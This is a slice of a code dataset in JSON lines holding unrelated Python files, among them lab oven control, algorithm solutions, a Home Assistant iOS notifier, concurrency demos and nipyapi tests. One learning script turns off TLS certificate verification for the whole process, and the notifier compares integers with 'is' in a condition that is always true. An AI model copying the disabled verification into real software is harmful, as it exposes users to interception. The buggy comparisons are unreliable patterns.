target_temperature = target_temperature\n\n print(\"PID set Temperature : \", str(target_temperature))\n print(\"Chamber real Temperature : \", temp_real)\n\n self.OVEN.TTC_Set_Temp(target_temperature)\n\n if APP_NEXTION_PRESENT:\n self.Father.updateIMPTemp([temp_set, temp_real, TEMP_sensor, HUMI_sensor, t_run])\n\n self.lock.acquire()\n self.t1 = datetime.datetime.now()\n self.lock.release()\n\n DE = str(DIS.read())\n # print (DE)\n self.RE_VAL.add(DE)\n # print (RE_VAL)\n\n if \"['e\\\\x0f\\\\x1b\\\\x01\\\\xff\\\\xff\\\\xff']\" in self.RE_VAL:\n print(\"Exiting\")\n self.OVEN.TTC_OFF()\n self.RE_VAL.clear()\n DIS.write(\"page Device Select\\xff\\xff\\xff\")\n return\n\n elif \"['e\\\\x0f\\\\x1c\\\\x01\\\\xff\\\\xff\\\\xff']\" in self.RE_VAL:\n # DIS.write(\"rest\\xff\\xff\\xff\")\n self.RE_VAL.clear()\n DIS.write(\"page restart\\xff\\xff\\xff\")\n os.system(\"sudo reboot\")\n\n print(\"07 - Updating Display...\")\n\n sleep(0.5)\n\n self.lock.acquire()\n self.step_counter += 1\n self.lock.release()\n\n self.OVEN.TTC_OFF()\n\nclass MeasureThread(Thread):\n def __init__(self, num_samples, start_freq, end_freq, set_voltage, Father, RE_VAL):\n Thread.__init__(self)\n # Initialize Relay\n\n self.REL = relay.Relay_module()\n self.REL.reset()\n\n if APP_IMP_PRESENT:\n self.IMP = Impedanz_4192A_Eth.Impedance_Analyser(IMP_IP, IMP_PORT)\n self.IMP.startComm()\n\n # create file and title\n self.CF = data_storage.create_file()\n self.test_mode = \"Auto\"\n self.equipment_Info = \"TTC-4006 + IMP-4192A\"\n Driver_root = detect_file.File(folder)[1]\n start_time = str(datetime.datetime.now())\n filename = start_time.replace(\" \", \"_\").replace(\".\", \"-\").replace(\":\", \"-\")\n self.CF.folder(Driver_root, filename)\n\n self.Oven = getCurrentOven( )\n\n self.CurrentStep = -1\n\n self.NEXTION_NUM_SAMPLES = num_samples\n self.NEXTION_START_FREQ = start_freq\n self.NEXTION_END_FREQ = end_freq\n self.NEXTION_SET_VOLTAGE = set_voltage\n\n self.Father = Father\n self.RE_VAL = RE_VAL\n\n def run(self):\n while(1):\n T = self.Oven.getTimes()\n S = self.Oven.getStepNum()\n StepContent = self.Oven.getStep()\n if T[0] > T[2] and T[0] < T[1] and S != self.CurrentStep:\n self.CurrentStep = S\n # create folder for each step\n self.CF.folder_IMP( StepContent )\n for i in range(self.NEXTION_NUM_SAMPLES):\n # relay selection\n print('03 - Swtich Relay: %d' % i)\n self.REL.RelaySelect(i)\n sleep(RELAY_HOLDING_TIME)\n\n # create folder for each sample\n current_time = str(datetime.datetime.now())\n self.time_str = current_time.replace(\" \", \"_\").replace(\".\", \"-\").replace(\":\", \"-\")\n\n self.Father.updateIMPSweep([\"Measuring\", \" \", i])\n\n DE = str(DIS.read())\n # print (DE)\n self.RE_VAL.add(DE)\n # print (RE_VAL)\n\n if \"['e\\\\x0f\\\\x1b\\\\x01\\\\xff\\\\xff\\\\xff']\" in self.RE_VAL:\n print(\"Exiting\")\n self.Oven.OVEN.TTC_OFF()\n self.RE_VAL.clear()\n DIS.write(\"page Device Select\\xff\\xff\\xff\")\n return\n\n elif \"['e\\\\x0f\\\\x1c\\\\x01\\\\xff\\\\xff\\\\xff']\" in self.RE_VAL:\n # DIS.write(\"rest\\xff\\xff\\xff\")\n self.RE_VAL.clear()\n DIS.write(\"page restart\\xff\\xff\\xff\")\n os.system(\"sudo reboot\")\n\n print(\"07 - Updating Display...\")\n\n # creat file\n sample_time = str(datetime.datetime.now()).replace(\" \", \"_\").replace(\".\", \"-\").replace(\":\", \"-\")\n name = 'Sample' + str(i)\n locals()['v' + str(i)] = i\n PA = self.CF.step_folder(name)\n self.CF.header_imp(PA, self.time_str, self.time_str, self.equipment_Info, self.test_mode,\n self.NEXTION_START_FREQ,\n self.NEXTION_END_FREQ, self.NEXTION_SET_VOLTAGE)\n\n # run multimeter\n print(\"04- Multimeter DMM196 Reading...\")\n if APP_IMP_PRESENT:\n data = self.IMP.sweep_measure(self.NEXTION_START_FREQ, self.NEXTION_END_FREQ,\n self.NEXTION_SET_VOLTAGE)\n self.CF.content(PA, self.time_str, data)\n\n # relay reset\n print(\"06 - Swtich Relay Unselection: %d\" % i)\n self.REL.RelayDeSelect(i)\n break\n else:\n self.Father.updateIMPStatus([\"Waiting\", \" \", 0])\n\n DE = str(DIS.read())\n # print (DE)\n self.RE_VAL.add(DE)\n # print (RE_VAL)\n\n if \"['e\\\\x0f\\\\x1b\\\\x01\\\\xff\\\\xff\\\\xff']\" in self.RE_VAL:\n print(\"Exiting\")\n self.Oven.OVEN.TTC_OFF()\n self.RE_VAL.clear()\n DIS.write(\"page Device Select\\xff\\xff\\xff\")\n return\n\n elif \"['e\\\\x0f\\\\x1c\\\\x01\\\\xff\\\\xff\\\\xff']\" in self.RE_VAL:\n # DIS.write(\"rest\\xff\\xff\\xff\")\n self.RE_VAL.clear()\n DIS.write(\"page restart\\xff\\xff\\xff\")\n os.system(\"sudo reboot\")\n\n print(\"07 - Updating Display...\")\n\n print('Waiting...')\n print(T)\n print(S)\n print(StepContent)\n sleep(1)\n\ndef getCurrentOven( ):\n global curOven\n return curOven\n\n\nclass TTC_IMP_Auto:\n def main(self, num_samples, start_freq, end_freq, set_voltage, Father):\n global curOven\n\n\n # Initialize screen\n self.RE_VAL = set()\n DE = str(DIS.read())\n # print (DE)\n self.RE_VAL.add(DE)\n # print (RE_VAL)\n\n # detect file\n if APP_PEN_DRIVE:\n FILE_NAME = detect_file.File(folder)[0]\n else:\n FILE_NAME = \"/home/pi/Desktop/Temperature_profile.txt\"\n\n # Load Profile\n TP = readTempProfile(FILE_NAME)[0]\n print(TP)\n\n curOven = OvenThread(TP, Father,self.RE_VAL)\n\n m = MeasureThread(num_samples, start_freq, end_freq, set_voltage, Father, self.RE_VAL)\n\n curOven.start( )\n m.start( )\n\nif __name__ == \"__main__\":\n TTC = TTC_IMP_Auto()\n TTC.main(8, 5, 13000, 1.1, None)\n","sub_path":"TTC_IMP_Auto.py","file_name":"TTC_IMP_Auto.py","file_ext":"py","file_size_in_byte":12515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"107326270","text":"##testing purposes\n\nfrom app import master, data, assembler, disassembler, tracker\n\nmydata = data.DataHolder('test.torrent')\nass = assembler.Assembler(mydata)\ndis = disassembler.Disassembler(ass ,mydata)\nmypeers = tracker.GetPeers(mydata)\nmymaster = master.Master(mydata)\n\n","sub_path":"tests/set_up_cmd.py","file_name":"set_up_cmd.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"416919427","text":"# %load q05_runs/build.py\n# Default Imports\nfrom greyatomlib.python_getting_started.q01_read_data.build import read_data\ndata = read_data()\nfrom unittest import TestCase\n\n\n# Your Solution\ndef BC_runs(data):\n \n l=(data['innings'][0]['1st innings']['deliveries'])\n c=0\n for x in l:\n for y in x:\n if(x[y]['batsman'])=='BB McCullum':\n c+=(x[y]['runs']['batsman'])\n \n\n\n\n runs=c\n return(runs)\n\n\n\n\n","sub_path":"q05_runs/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"305063427","text":"class Solution_BST(object):\n def countSmaller(self, nums):\n class TreeNode:\n def __init__(self, v):\n self.val = v\n self.left = None\n self.right = None\n self.less_equal = 1\n\n def insert(node, num):\n if num <= node.val:\n node.less_equal += 1\n if not node.left:\n node.left = TreeNode(num)\n return 0\n else:\n return insert(node.left, num)\n else:\n if not node.right:\n node.right = TreeNode(num)\n return node.less_equal\n else:\n return node.less_equal + insert(node.right, num)\n\n r = [0 for _ in range(len(nums))]\n if r:\n root = TreeNode(nums[-1])\n for i in range(len(nums) - 1)[::-1]:\n r[i] = insert(root, nums[i])\n return r\n\nclass Solution_MergeSort:\n def countSmaller(self, nums):\n def sort(a):\n m = len(a) // 2\n if m:\n left, right = a[:m], a[m:]\n sort(left)\n sort(right)\n for i in range(len(a))[::-1]:\n if not right or left and left[-1][1] > right[-1][1]:\n smaller[left[-1][0]] += len(right)\n a[i] = left.pop()\n else:\n a[i] = right.pop()\n\n smaller = [0 for _ in nums]\n sort(list(enumerate(nums)))\n return smaller\n\nclass Solution_BIT:\n def countSmaller(self, nums):\n def add(bit, i, v):\n while i < len(bit):\n bit[i] += v\n i += (i & -i)\n\n def sum(bit, i):\n r = 0\n while i > 0:\n r += bit[i]\n i -= (i & -i)\n return r\n\n n = len(nums)\n bit = [0 for _ in range(n + 1)]\n idx = { v: i for i, v in enumerate(sorted(nums)) }\n print(idx)\n r = [0 for _ in range(n)]\n for i in range(n)[::-1]:\n r[i] = sum(bit, idx[nums[i]])\n add(bit, idx[nums[i]] + 1, 1)\n return r\n\nclass Solution_BinarySearch:\n def countSmaller(self, nums):\n import bisect\n r = []\n t = []\n for num in nums[::-1]:\n i = bisect.bisect_left(t, num)\n r.insert(0, i)\n bisect.insort(t, num)\n return r\n\nclass Solution_BitWiseCompare:\n def countSmaller(self, nums):\n def solve(idx, mask):\n if idx and mask:\n highGroup = []\n lowGroup = []\n for i in idx:\n if (nums[i] & mask) == (mask if mask != (1 << 31) else 0):\n result[i] += len(lowGroup)\n highGroup.append(i)\n else:\n lowGroup.append(i)\n solve(highGroup, mask >> 1)\n solve(lowGroup, mask >> 1)\n\n idx = list(range(len(nums))[::-1])\n result = [0 for _ in nums]\n solve(idx, 1 << 31)\n return result\n\n\ns = Solution_BIT()\nnums = [5, 2, 6, 1]\nr = s.countSmaller(nums)\nprint(r)\n","sub_path":"leetcode/count_of_smaller_numbers_after_self.py","file_name":"count_of_smaller_numbers_after_self.py","file_ext":"py","file_size_in_byte":3234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"390735649","text":"\"\"\"\niOS push notification platform for notify component.\n\nFor more details about this platform, please refer to the documentation at\nhttps://home-assistant.io/components/notify.ios/\n\"\"\"\nimport logging\nfrom datetime import datetime, timezone\nimport requests\n\nfrom homeassistant.components import ios\n\nimport homeassistant.util.dt as dt_util\n\nfrom homeassistant.components.notify import (\n ATTR_TARGET, ATTR_TITLE, ATTR_TITLE_DEFAULT, ATTR_MESSAGE,\n ATTR_DATA, BaseNotificationService)\n\n_LOGGER = logging.getLogger(__name__)\n\nPUSH_URL = \"https://ios-push.home-assistant.io/push\"\n\nDEPENDENCIES = [\"ios\"]\n\n\ndef get_service(hass, config):\n \"\"\"Get the iOS notification service.\"\"\"\n if \"notify.ios\" not in hass.config.components:\n # Need this to enable requirements checking in the app.\n hass.config.components.append(\"notify.ios\")\n\n return iOSNotificationService()\n\n\n# pylint: disable=too-few-public-methods, too-many-arguments, invalid-name\nclass iOSNotificationService(BaseNotificationService):\n \"\"\"Implement the notification service for iOS.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize the service.\"\"\"\n\n @property\n def targets(self):\n \"\"\"Return a dictionary of registered targets.\"\"\"\n return ios.devices_with_push()\n\n def send_message(self, message=\"\", **kwargs):\n \"\"\"Send a message to the Lambda APNS gateway.\"\"\"\n data = {ATTR_MESSAGE: message}\n\n if kwargs.get(ATTR_TITLE) is not None:\n # Remove default title from notifications.\n if kwargs.get(ATTR_TITLE) != ATTR_TITLE_DEFAULT:\n data[ATTR_TITLE] = kwargs.get(ATTR_TITLE)\n\n targets = kwargs.get(ATTR_TARGET)\n\n if not targets:\n targets = ios.enabled_push_ids()\n\n if kwargs.get(ATTR_DATA) is not None:\n data[ATTR_DATA] = kwargs.get(ATTR_DATA)\n\n for target in targets:\n data[ATTR_TARGET] = target\n\n req = requests.post(PUSH_URL, json=data, timeout=10)\n\n if req.status_code is not 201:\n message = req.json()[\"message\"]\n if req.status_code is 429:\n _LOGGER.warning(message)\n elif req.status_code is 400 or 500:\n _LOGGER.error(message)\n\n if req.status_code in (201, 429):\n rate_limits = req.json()[\"rateLimits\"]\n resetsAt = dt_util.parse_datetime(rate_limits[\"resetsAt\"])\n resetsAtTime = resetsAt - datetime.now(timezone.utc)\n rate_limit_msg = (\"iOS push notification rate limits for %s: \"\n \"%d sent, %d allowed, %d errors, \"\n \"resets in %s\")\n _LOGGER.info(rate_limit_msg,\n ios.device_name_for_push_id(target),\n rate_limits[\"successful\"],\n rate_limits[\"maximum\"], rate_limits[\"errors\"],\n str(resetsAtTime).split(\".\")[0])\n","sub_path":"homeassistant/components/notify/ios.py","file_name":"ios.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"615980781","text":"import random\nfrom urllib.request import urlopen\nimport sys\nimport ssl\n\nssl._create_default_https_context = ssl._create_unverified_context\n\n\nword_url = \"https://learncodethehardway.org/words.txt\"\nwords = []\n\nphrases = {\n \"class %%%{%%%}:\":\n \"make a clase named %%% that is a %%%\",\n \"class %%%(object):\\n\\tdef __init__(self, ***)\":\n \"class %%% has a __init__ that takes self and *** params:\",\n \"class %%%(object):\\n\\tdef ***(self, @@@)\":\n \"class %%% has a function *** that takes self and @@@ params:\",\n \"*** = %%%()\":\n \"set *** to an instance of class %%%\",\n \"***.***(@@@)\":\n \"from *** get the *** function, call it with the params self and @@@\",\n \"***.*** = '***'\":\n \"from *** get the *** attributes and set it to '***'\"\n }\n\n# do they want to drill phrases first?\n# this checks for the arugmetns in the terminal if there is 2 arguments (phython3.6 file name cass)\n# if user types in exactly \"english\" as the 2nd arugment then it will run phrase_first = true\n# this means that it will provide the phrase and user enters snippet\n# else default is user enters snippet based on phrase\nif len(sys.argv) == 2 and sys.argv[1] == 'english':\n phrase_first = True\nelse:\n phrase_first = False\n\n#load up the words form the website, and create a list of words\nfor word in urlopen(word_url).readlines():\n words.append(str(word.strip(), encoding=\"utf-8\"))\n\n# fucntion name is convert\n# this takes snippet and phrase from phrases dictonary above \n# snippet and phrase are from the function below (snippets = list(phrases.keys() and \n# phrase is frome the object of the snippet key phrase = phrases[snippet])\n\ndef convert(snippet, phrase):\n #capatalize the first letter for class names\n class_names = [w.capitalize() for w in \n random.sample(words, snippet.count(\"%%%\"))]\n # selcts a random word for otehr name that can be eitehr fucntion name or params name\n other_names = random.sample(words,snippet.count(\"***\"))\n #store valeus in array below\n results = []\n param_names = []\n\n for i in range (0, snippet.count(\"@@@\")):\n param_count = random.randint(1,3)\n param_names.append(', '.join(\n random.sample(words, param_count)\n ))\n\n for sentence in snippet, phrase:\n result = sentence[:]\n\n #replace class name placehoder with random word and store in select\n for word in class_names:\n result = result.replace(\"%%%\", word, 1)\n\n #fake other names\n for word in other_names:\n result = result.replace(\"***\", word, 1)\n \n #fake parameter lists\n for word in param_names:\n result = result.replace(\"@@@\", word, 1)\n\n results.append(result)\n\n return results\n\n#keep ging until they hit ctlr-D\ntry:\n while True:\n #from the phrases diction list all the keys\n snippets = list(phrases.keys())\n random.shuffle(snippets)\n for snippet in snippets:\n phrase = phrases[snippet]\n question, answer = convert(snippet, phrase)\n if phrase_first:\n question, answer = answer, question\n \n print(question)\n input(\">\")\n print(f\"answer: {answer} \\n\")\n \nexcept EOFError:\n print(\"\\nBYE!\")\n","sub_path":"oop_test.py","file_name":"oop_test.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"344739004","text":"#信号量\n# 信号量的本质是带计数器的锁\n#信号量和线程池的区别\n#相同点:在信号量 acquire 之后,和线程池一样 同时在执行的只能有n个\n#不同点:\n # 开的线程数不一样,线程池只开固定数量的线程,信号量有几个任务就开几个线程。\n #\n\n# 对有信号量限制的程序来说,可以同时执行很多线程吗 ?\n# 可以\n\n#实际上信号并不影响线程或者进程的并发,只是在加锁的阶段进行流量限制\n\n\n# from multiprocessing import Semaphore\n# sem = Semaphore(4) # Semaphore默认参数是1, 参数4 表示 同时只能起四个进程\n# sem.acquire()\n# print(0)\n# sem.acquire()\n# print(1)\n# sem.acquire()\n# print(2)\n# sem.acquire()\n# print(3)\n# sem.acquire() #阻塞 4 打印不出来\n# print(4)\n\n# sem.release() #释放一把锁,4可以打印出来\n# print(4)\n\n#0\n#1\n#2\n#3\n\n################ 模拟唱吧 ################\nimport random\nimport time\nfrom multiprocessing import Semaphore\nfrom multiprocessing import Process\n\ndef sing(i, sem):\n sem.acquire()\n print('%s 进入KTV' %i)\n time.sleep(random.randint(1, 10)) # 进入KTV喝歌1到10s\n print('%s 离开KTV' %i)\n sem.release()\n\nif __name__ == '__main__':\n sem = Semaphore(4) # 只能有四个人同时进入KTV\n for i in range(20): # 有20个人想进 KTV 唱歌\n Process(target=sing, args=(i, sem)).start()\n\n\n# from threading import Thread\n# from threading import Semaphore\n# import time\n# import random\n#\n# def func(n, scm):\n# scm.acquire()\n# print('thead -%s start' %n)\n# time.sleep(random.random())\n# print('thread -%s done' %n)\n# scm.release()\n#\n# scm = Semaphore(5) # 一把锁有五把钥匙,同一时间只能有5个线程在执行\n# for i in range(20):\n# Thread(target=func, args=(i, scm)).start()\n","sub_path":"process/process_single.py","file_name":"process_single.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"496533996","text":"\"\"\"MyCRM URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom crm import views\n\nurlpatterns = [\n url(r'^$', views.dashboard, name=\"sales_dashboard\"),\n url(r'^stu_enrollment/$', views.stu_enrollment, name=\"stu_enrollment\"),\n url(r'^enrollment/(?P\\d+)/$', views.enrollment, name=\"enrollment\"),\n url(r'^enrollment/(?P\\d+)/file_upload/$',\n views.enrollment_file_upload, name=\"enrollment_file_upload\"),\n url(r'^stu_enrollment/(?P\\d+)/contract_audit/$',\n views.enrollment_contract_audit, name=\"enrollment_contract_audit\"),\n]\n","sub_path":"SelfLearn/框架(Django)/181214_CRM/MyCRM/crm/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"11177560","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed May 22 21:14:58 2019\r\n\r\n@author: chakradhara rao\r\n\"\"\"\r\n'''\r\nThis problem was asked by Google.\r\n\r\nGiven the root to a binary tree, implement serialize(root), which serializes the tree into a string, and deserialize(s), which deserializes the string back into the tree.\r\n\r\nFor example, given the following Node class\r\n\r\nclass Node:\r\n def __init__(self, val, left=None, right=None):\r\n self.val = val\r\n self.left = left\r\n self.right = right\r\nThe following test should pass:\r\n\r\nnode = Node('root', Node('left', Node('left.left')), Node('right'))\r\nassert deserialize(serialize(node)).left.left.val == 'left.left' '''\r\nclass Node:\r\n def __init__(self, val, left=None, right=None):\r\n self.d = val\r\n self.l = left\r\n self.r = right\r\n def __repr__(self):\r\n return '{name:'+str(self.d)+ '}'\r\n def __str__(self):\r\n return '{name:'+str(self.d)+'}'\r\nclass bt:\r\n def __init__(self,n):\r\n self.r=n\r\n self.c=1\r\n self.l=[self.r]\r\n def insert(self,n):\r\n n=Node(n)\r\n a=self.l[0]\r\n if a.l==None:\r\n a.l=n\r\n self.c+=1\r\n else:\r\n a.r=n\r\n self.c+=1\r\n del self.l[0]\r\n self.l.append(n)\r\ndef serialize(n):\r\n l=[n]\r\n if n.l!=None:\r\n l.append(serialize(n.l))\r\n if n.r!=None:\r\n l.append(serialize(n.r))\r\n return l\r\ndef deserialize(l):\r\n x=bt(l[0])\r\n for a in l[1:]:\r\n x.insert(a)\r\n return x.r\r\nnode = Node('root', Node('left', Node('left.left')), Node('right'))\r\nprint(serialize(node))\r\nassert deserialize(serialize(node)).l.l.d == 'left.left'","sub_path":"3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"168075537","text":"from src.homework.homework9.die import Die\n#write import statement for Die class\n\n'''\nCreate a Player class.\n\n'''\n\n\nclass Player:\n\n def __init__(self):\n '''\n Constructor method creates two Die attributes die1 and die2\n '''\n self.die1 = Die()\n self.die2 = Die()\n\n def roll_doubles(self):\n '''\n The roll_doubles method that will roll die1 and die2 (attributes from constructor method),\n display rolled values,and continue iterating until a double is rolled.\n '''\n value1 = 0\n value2 = 0\n\n while value1 != value2:\n value1 = self.die1.roll()\n print(\"This is value 1: \", value1)\n value2 = self.die2.roll()\n print(\"This is value 2: \", value2)\n","sub_path":"src/homework/homework9/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"630451683","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Tests for `nipyapi` package.\"\"\"\n\nimport pytest\nfrom tests import conftest\nfrom nipyapi import canvas, nifi\nfrom nipyapi.nifi import ProcessGroupFlowEntity, ProcessGroupEntity\nfrom nipyapi.nifi import ProcessorTypesEntity, DocumentedTypeDTO\nfrom nipyapi.nifi.rest import ApiException\n\n\ndef test_get_root_pg_id():\n r = canvas.get_root_pg_id()\n assert isinstance(r, str)\n\n\ndef test_get_process_group_status(regress):\n r = canvas.get_process_group_status(pg_id='root', detail='names')\n assert isinstance(r, dict)\n r = canvas.get_process_group_status('root', 'all')\n assert isinstance(r, ProcessGroupEntity)\n # We rely on this int for testing if a PG is running or not\n assert isinstance(r.running_count, int)\n with pytest.raises(AssertionError):\n _ = canvas.get_process_group_status('root','invalid')\n\n\ndef test_get_flow():\n r = canvas.get_flow('root')\n assert isinstance(r, ProcessGroupFlowEntity)\n assert r.process_group_flow.breadcrumb.breadcrumb.name == 'NiFi Flow'\n with pytest.raises(ValueError):\n _ = canvas.get_flow('definitelyNotAPG')\n\n\ndef test_recurse_flow(fix_pg, regress):\n _ = fix_pg.generate()\n r = canvas.recurse_flow('root')\n assert isinstance(r, ProcessGroupFlowEntity)\n assert r.process_group_flow.breadcrumb.breadcrumb.name == 'NiFi Flow'\n assert isinstance(\n r.process_group_flow.flow.process_groups[0].nipyapi_extended,\n ProcessGroupFlowEntity\n )\n\n\ndef test_list_all_process_groups(fix_pg, regress):\n _ = fix_pg.generate()\n r = canvas.list_all_process_groups()\n assert isinstance(r, list)\n for pg in r:\n assert isinstance(pg, ProcessGroupEntity)\n\n\ndef test_create_process_group(regress):\n r = canvas.create_process_group(\n canvas.get_process_group(canvas.get_root_pg_id(), 'id'),\n conftest.test_pg_name,\n location=(400.0,400.0)\n )\n assert r.component.name == conftest.test_pg_name\n assert r.position.x == r.position.y == 400\n assert r.component.parent_group_id == canvas.get_root_pg_id()\n assert isinstance(r, nifi.ProcessGroupEntity)\n with pytest.raises(ApiException):\n parent_pg = canvas.get_process_group('NiFi Flow')\n parent_pg.id = 'invalid'\n _ = canvas.create_process_group(\n parent_pg,\n 'irrelevant',\n (0, 0)\n )\n\n\ndef test_get_process_group(fix_pg, regress):\n with pytest.raises(AssertionError):\n _ = canvas.get_process_group('nipyapi_test', 'invalid')\n f_pg = fix_pg.generate()\n pg1 = canvas.get_process_group(f_pg.id, 'id')\n assert isinstance(pg1, ProcessGroupEntity)\n duplicate_pg = fix_pg.generate()\n pg2 = canvas.get_process_group(duplicate_pg.id, 'id')\n assert pg2.id != pg1.id\n pg_list = canvas.get_process_group(f_pg.status.name)\n assert isinstance(pg_list, list)\n # the two duplicates, and root = 3\n assert len(pg_list) == 3\n\n\ndef test_delete_process_group(fix_pg, regress, fix_proc):\n # Delete stopped PG\n f_pg1 = fix_pg.generate()\n r1 = canvas.delete_process_group(f_pg1)\n assert r1.id == f_pg1.id\n assert r1.status is None\n # Test deleting a running PG\n pg_2 = fix_pg.generate()\n _ = fix_proc.generate(parent_pg=pg_2)\n canvas.schedule_process_group(pg_2.id, True)\n with pytest.raises(ValueError):\n _ = canvas.delete_process_group(pg_2)\n # Once more with feeling\n r2 = canvas.delete_process_group(\n pg_2,\n force=True\n )\n assert r2.status is None\n\n\ndef test_schedule_process_group(fix_proc, fix_pg):\n f_pg = fix_pg.generate()\n _ = fix_proc.generate(parent_pg=f_pg)\n r1 = canvas.schedule_process_group(\n f_pg.id,\n True\n )\n status = canvas.get_process_group(f_pg.id, 'id')\n assert r1 is True\n assert status.running_count == 1\n r2= canvas.schedule_process_group(\n f_pg.id,\n False\n )\n assert r2 is True\n status = canvas.get_process_group(f_pg.id, 'id')\n assert status.running_count == 0\n assert status.stopped_count == 1\n with pytest.raises(AssertionError):\n _ = canvas.schedule_process_group(\n f_pg.id,\n 'BANANA'\n )\n\n\ndef test_list_all_processor_types(regress):\n r = canvas.list_all_processor_types()\n assert isinstance(r, ProcessorTypesEntity)\n assert len(r.processor_types) > 1\n\n\ndef test_get_processor_type(regress):\n r1 = canvas.get_processor_type('twitter')\n assert r1.type == 'org.apache.nifi.processors.twitter.GetTwitter'\n assert isinstance(r1, DocumentedTypeDTO)\n r2 = canvas.get_processor_type(\"syslog\", 'tag')\n assert isinstance(r2, list)\n r3 = canvas.get_processor_type('standard')\n assert isinstance(r3, list)\n assert len(r3) > 10\n\n\ndef test_create_processor(fix_pg, regress):\n f_pg = fix_pg.generate()\n r1 = canvas.create_processor(\n parent_pg=f_pg,\n processor=canvas.get_processor_type('GenerateFlowFile'),\n location=(400.0, 400.0),\n name=conftest.test_processor_name\n )\n assert isinstance(r1, nifi.ProcessorEntity)\n assert r1.status.name == conftest.test_processor_name\n\n\ndef test_list_all_processors(fix_proc, regress):\n _ = fix_proc.generate()\n _ = fix_proc.generate()\n r = canvas.list_all_processors()\n assert len(r) >= 2\n assert isinstance(r[0], nifi.ProcessorEntity)\n\n\ndef test_get_processor(fix_proc, regress):\n f_p1 = fix_proc.generate()\n r1 = canvas.get_processor(f_p1.status.name)\n assert isinstance(r1, nifi.ProcessorEntity)\n r2 = canvas.get_processor('ClearlyNotAProcessor')\n assert r2 is None\n f_p2 = fix_proc.generate()\n r3 = canvas.get_processor(f_p1.status.name)\n assert isinstance(r3, list)\n r4 = canvas.get_processor(f_p2.id, 'id')\n assert isinstance(r4, nifi.ProcessorEntity)\n assert r4.id != r1.id\n\n\ndef test_schedule_processor(fix_proc):\n f_p1 = fix_proc.generate()\n r1 = canvas.schedule_processor(\n f_p1,\n True\n )\n status = canvas.get_processor(f_p1.id, 'id')\n assert r1 is True\n assert status.status.run_status == 'Running'\n r2 = canvas.schedule_processor(\n f_p1,\n False\n )\n status = canvas.get_processor(f_p1.id, 'id')\n assert status.status.run_status == 'Stopped'\n assert r2 is True\n with pytest.raises(AssertionError):\n _ = canvas.schedule_processor(\n f_p1,\n 'BANANA'\n )\n\n\ndef test_delete_processor(fix_proc, regress):\n f_p1 = fix_proc.generate()\n r1 = canvas.delete_processor(f_p1)\n assert r1.status is None\n assert isinstance(r1, nifi.ProcessorEntity)\n # try to delete processor twice\n with pytest.raises(ValueError):\n _ = canvas.delete_processor(f_p1)\n # try to delete running processor\n f_p2 = fix_proc.generate()\n canvas.schedule_processor(f_p2, True)\n with pytest.raises(ValueError):\n _ = canvas.delete_processor(f_p2)\n # and once more with feeling, er, force\n r2 = canvas.delete_processor(f_p2, force=True)\n assert r2.status is None\n\n\ndef test_update_processor(fix_proc, regress):\n # TODO: Add way more tests to this\n f_p1 = fix_proc.generate()\n update = nifi.ProcessorConfigDTO(\n scheduling_period='3s'\n )\n r1 = canvas.update_processor(f_p1, update)\n with pytest.raises(ValueError, match='update param is not an instance'):\n _ = canvas.update_processor(f_p1, 'FakeNews')\n\n\ndef test_get_variable_registry(fix_pg):\n test_pg = fix_pg.generate()\n r1 = canvas.get_variable_registry(test_pg)\n assert isinstance(r1, nifi.VariableRegistryEntity)\n with pytest.raises(ValueError, match='Unable to locate group with id'):\n canvas.delete_process_group(test_pg)\n _ = canvas.get_variable_registry(test_pg)\n\n\ndef test_update_variable_registry(fix_pg):\n test_pg = fix_pg.generate()\n r1 = canvas.update_variable_registry(\n test_pg,\n conftest.test_variable_registry_entry\n )\n assert isinstance(r1, nifi.VariableRegistryEntity)\n with pytest.raises(ValueError,\n match='param update is not a valid list of'\n ):\n _ = canvas.update_variable_registry(test_pg, '')\n\n\ndef test_get_connections():\n # TODO: Waiting for create_connection to generate fixture\n pass\n\n\ndef test_purge_connection():\n # TODO: Waiting for create_connection to generate fixture\n pass\n\n\ndef test_purge_process_group():\n # TODO: Waiting for create_connection to generate fixture\n pass\n\n\ndef test_get_bulletins():\n r = canvas.get_bulletins()\n assert isinstance(r, nifi.ControllerBulletinsEntity)\n\n\ndef test_get_bulletin_board():\n r = canvas.get_bulletin_board()\n assert isinstance(r, nifi.BulletinBoardEntity)\n","sub_path":"tests/test_canvas.py","file_name":"test_canvas.py","file_ext":"py","file_size_in_byte":8746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"112139628","text":"# -*- coding=utf-8 -*-\n# library: 